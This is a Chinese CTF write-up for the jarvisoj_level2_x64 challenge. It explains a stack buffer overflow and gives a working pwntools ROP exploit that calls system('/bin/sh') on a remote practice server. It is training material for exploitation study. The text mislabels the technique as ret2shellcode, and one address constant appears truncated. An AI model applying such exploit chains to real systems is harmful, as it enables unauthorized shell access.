└─# checksec pwn  
[*] '/mnt/e/work/PWN/buuctf/jarvisoj_level2_x64/pwn'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

狗屎开了NX 又是一眼shellcode不就是叫你踩坑吗 服了

IDA64

/* Entry point of the target (decompiled): all input handling happens in
   vulnerable_function(); the greeting afterwards means system() is linked
   into the binary and reachable at a fixed address (No PIE per checksec). */
int __cdecl main(int argc, const char **argv, const char **envp)
{
vulnerable_function(argc, argv, envp);
return system("echo 'Hello World!'");
}
/* The bug (decompiled): a 0x80-byte stack buffer filled by an unbounded read(). */
ssize_t vulnerable_function()
{
char buf[128]; // [rsp+0h] [rbp-80h] BYREF

system("echo Input:");
/* Reads up to 0x200 bytes into a 0x80-byte buffer with no length check and,
   per the checksec output above, no stack canary: up to 0x180 bytes can run
   past buf over the saved rbp and the return address. The fix is to bound the
   read by sizeof(buf). */
return read(0, buf, 0x200uLL);
}

可以知道 offset = 0x80 + 0x8（buf 位于 rbp-0x80，再加上 8 字节保存的 rbp，才到返回地址）

data:0000000000600A90                               public hint
.data:0000000000600A90 2F 62 69 6E 2F 73 68 00 hint db '/bin/sh',0
.data:0000000000600A90 _data ends
.data:0000000000600A90

找到 /bin/sh 字符串在 .data 中的地址：system_data = 0x600A90

容易知道这题是ret2shellcode

exp

from pwn import *
from LibcSearcher import *
# pwntools context for the 64-bit Linux target; log_level="debug" dumps every
# byte sent/received. `terminal` is what gdb.attach() uses to open a window
# (presumably Windows Terminal launching WSL — confirm on your setup).
context(
terminal=["wt.exe","wsl"],
os = "linux",
arch = "amd64",
#arch = "i386",
log_level="debug",
)
elf = ELF("./pwn")  # the challenge binary from the checksec output above (NX on, No PIE, no canary)
#io = process("./pwn")
io = remote("node4.buuoj.cn",26304)  # remote instance; use the process() line above instead to run locally
def debug():
    """Attach gdb to the live target ``io`` and pause until resumed.

    Intended to be called before the payload is sent (see the commented-out
    call below); only useful with a local process(), not the remote.
    """
    gdb.attach(io)
    pause()
#debug()
# Distance from buf (rbp-0x80 in the IDA listing) to the saved return address:
# 0x80 bytes of buffer plus 8 bytes of saved rbp.
offset=0x80+0x8
shell_data = 0x600A90   # .data address of the '/bin/sh' string (from the IDA .data dump above)
system_addr= 0x4004C0   # address used to call system(); taken from the binary, not shown in the listings above
pop_rdi = 0x4006b3      # `pop rdi; ret` gadget for the first argument; also from the binary, not shown above
ret_addr = 0x404a1      # NOTE(review): unused below and one hex digit shorter than the other .text
                        # addresses — looks truncated; presumably meant for the stack-alignment
                        # note at the end of the write-up. Verify before relying on it.
# Overwrite the return address with: pop_rdi -> rdi = &"/bin/sh" -> system.
# The whole chain fits because vulnerable_function reads up to 0x200 bytes.
payload = cyclic(offset)+p64(pop_rdi)+p64(shell_data)+p64(system_addr)
io.sendline(payload)
io.interactive()

注意！本地打记得栈对齐！（`movaps xmmword ptr [rsp + 0x50], xmm0` 要求 rsp 按 16 字节对齐，否则会在这里崩溃）